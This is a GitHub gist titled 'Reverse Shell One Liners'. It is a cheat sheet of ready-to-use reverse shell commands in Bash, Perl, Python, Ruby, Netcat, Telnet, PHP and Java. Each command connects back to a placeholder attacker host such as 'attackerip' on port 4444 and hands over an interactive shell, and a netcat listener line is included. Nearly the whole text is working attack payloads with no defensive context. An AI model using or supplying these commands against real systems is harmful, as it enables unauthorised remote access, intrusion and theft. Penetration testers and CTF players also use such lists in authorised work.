Created
November 21, 2019 11:48
-
-
Save jcalabres/1bf495caa29d018cfbfed0e269ef9ce6 to your computer and use it in GitHub Desktop.
Reverse Shell One Liners
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nc -nvlp 4444 | |
#Bash | |
exec /bin/bash 0&0 2>&0 | |
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 | |
exec 5<>/dev/tcp/attackerip/4444 | |
cat <&5 | while read line; do $line 2>&5 >&5; done # or: | |
while read line 0<&5; do $line 2>&5 >&5; done | |
bash -i >& /dev/tcp/attackerip/4444 0>&1 | |
#Perl | |
//Does not depend on /bin/sh | |
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' | |
//Windows target | |
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' | |
//Could try this one also. (*nix /bin/sh) | |
perl -e 'use Socket;$i="attackerip";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | |
#Python | |
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' | |
#Ruby | |
//Does not depend on /bin/sh | |
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' | |
//Windows Target | |
ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' | |
//*nix /bin/sh | |
ruby -rsocket -e'f=TCPSocket.open("attackerip",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | |
#Netcat | |
nc attackerip 4444 -e /bin/sh | |
/bin/sh | nc attackerip 4444 | |
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p | |
#Telnet | |
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p | |
Or: | |
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 | |
# Setup listener on attcker machine on port 4445/tcp | |
#PHP | |
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' | |
# This code assumes that the TCP connection uses file descriptor 3. | |
# If it doesn’t work, try 4, 5, 6… | |
#Java | |
r = Runtime.getRuntime() | |
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) | |
p.waitFor() | |
by ub3rsec |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment